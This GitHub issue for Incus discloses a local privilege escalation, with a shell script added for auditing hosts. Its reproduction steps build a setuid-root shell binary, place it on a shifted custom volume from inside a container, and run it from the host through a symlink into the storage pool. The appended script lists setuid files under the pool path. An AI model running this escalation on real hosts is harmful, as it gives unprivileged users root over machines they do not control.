Local privilege escalation: a local unprivileged user in a restricted project may obtain host root privileges under certain conditions. #2641

@abdodz1234

Is there an existing issue for this?

  • There is no existing issue for this bug

Is this happening on an up to date version of Incus?

  • This is happening on a supported version of Incus

Incus system details

Tested on Debian 13 & Arch Linux

Instance details

No response

Instance log

No response

Current behavior

No response

Expected behavior

No response

Steps to reproduce

incus launch images:alpine/edge ct1
incus storage volume create default data
incus config device add ct1 test disk pool=default source=data path=/data
incus storage volume set default data security.shifted=true


cat shell.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);

    system("su");
}

gcc shell.c -o shell
incus file push shell  ct1/data/
incus exec ct1 -- chown 0:0 /data/shell
incus exec ct1 -- chmod 4755 /data/shell
ln -s /var/lib/incus/storage-pools/default/custom/user-1000_data/shell sh
./sh
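
The reproduction above ends with a host user executing a setuid-root file that sits on a custom volume under the storage pool path. The following host-side audit is an added example (not part of the report and not Incus code): it lists setuid/setgid files under that path and notes whether the directory chain is traversable by unprivileged users. The function names and the `POOL_CUSTOM_DIR` variable are hypothetical, and the default path is assumed from the report.

```shell
#!/bin/sh
# Added example, not Incus code: host-side audit for setuid/setgid files
# inside Incus custom storage volumes (needs GNU stat; run as root on the host).
# Assumption: default pool path as it appears in the report above.
POOL_CUSTOM_DIR="${POOL_CUSTOM_DIR:-/var/lib/incus/storage-pools/default/custom}"

# other_can_traverse DIR TOP
# Succeeds when every directory from DIR up to TOP (inclusive) carries the
# "other" execute bit, i.e. any local user can walk from TOP down to DIR.
# Parents of TOP are not examined here.
other_can_traverse() {
    _d=$1 _top=$2
    while :; do
        # Character 10 of the ls mode string is the other-execute slot.
        case $(ls -ld -- "$_d" | cut -c10) in
            x|t) ;;
            *) return 1 ;;
        esac
        case $_d in "$_top"|/|.) return 0 ;; esac
        _d=$(dirname -- "$_d")
    done
}

# audit_volumes [TOP]
# Prints "<mode> uid=<owner> <reachability> <path>" for each setuid or
# setgid regular file under TOP. Returns 1 if any were found, else 0.
audit_volumes() {
    _root=${1:-$POOL_CUSTOM_DIR}
    _root=${_root%/}
    _hits=$(find "$_root" -type f \( -perm -4000 -o -perm -2000 \) -print)
    [ -z "$_hits" ] && return 0
    # Newline-delimited: volume paths containing newlines are not handled.
    printf '%s\n' "$_hits" | while IFS= read -r _f; do
        if other_can_traverse "$(dirname -- "$_f")" "$_root"; then
            _reach=world-reachable
        else
            _reach=restricted
        fi
        printf '%s %s %s\n' "$(stat -c '%a uid=%u' "$_f")" "$_reach" "$_f"
    done
    return 1
}
```

Source the file and call `audit_volumes` with no argument to scan the assumed default path; a `world-reachable` line with `uid=0` is the condition the reproduction relies on.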
